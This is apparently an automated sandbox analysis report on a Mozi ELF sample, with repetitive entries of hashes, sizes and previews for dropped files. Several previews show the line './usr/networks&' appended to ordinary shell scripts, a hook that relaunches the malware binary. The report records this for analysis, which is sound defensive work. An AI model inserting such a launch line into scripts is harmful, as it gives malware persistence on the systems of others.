                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):140
                                                              Entropy (8bit):4.630000937813715
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaBQBEvedQVLpvyoYxvMRvbY6K3OmQLk9bJjWXVOORgn:wDdQfUxMa3OngxJjWMn
                                                              MD5:864C0B993466007E84B2C18EC3BFC6F2
                                                              SHA1:A714DC923D9DB001F3AD2DA05A9C617875335F85
                                                              SHA-256:209EDFC7B23AC287C7403F7ABEEE52FE743C44B97C606201F940199C066CE312
                                                              SHA-512:E023083DCF81C1038870F27210C9A526574BD1249DE23754EF9661D37DB94F6FFF3DC3308C65830B04C899B5B4434A7519024716DE9BB2019A408224055C104B
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..trap cleanup EXIT..setup_prepare.setup_wait.routing_nh_obj..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):57
                                                              Entropy (8bit):4.424738040366664
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                              MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                              SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                              SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                              SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):10729
                                                              Entropy (8bit):5.234277562227559
                                                              Encrypted:false
                                                              SSDEEP:192:lMTUQUTequHlteEKkMBiaGsAj0932IgQ3:lZruj4ifQ9
                                                              MD5:72E76957C6C8B8401BEDC93F102DFF2C
                                                              SHA1:CC16B914A03B7FC19080A70052F306A4D4EB4FF5
                                                              SHA-256:FC9346B8263E4837A567D526C00B521015FCE8228D3EE23C792A8AD3D4C1F596
                                                              SHA-512:25E94A808270DD0ADFEF745F8482BFD747F88B1944508CE3A7EFBE9E150FD71E9927954C8A08613A9A39880A3B2971DF44E583F242C091C149E1CA4F42913AD5
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_debug().{..if [ "$VERBOSE" = "1" ]; then...echo "$*"..fi.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local ns=$1..local dev=$2..local addr...addr=$(ip -netns $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.# setup and teardown..cleanup().{..local ns...for ns in h1 h2 r1 r2; do...ip netns del $ns 2>/dev/null..done.}..create_vrf().{..local ns=$1...ip -netns ${ns} link add ${VRF} type vrf table ${VRF_TABLE}..ip -netns ${ns} link set ${VRF} up..ip -netns ${ns} route add vrf ${VRF} unreac
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):49
                                                              Entropy (8bit):4.073694027700372
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORjusVOORgn:Hn
                                                              MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                              SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                              SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
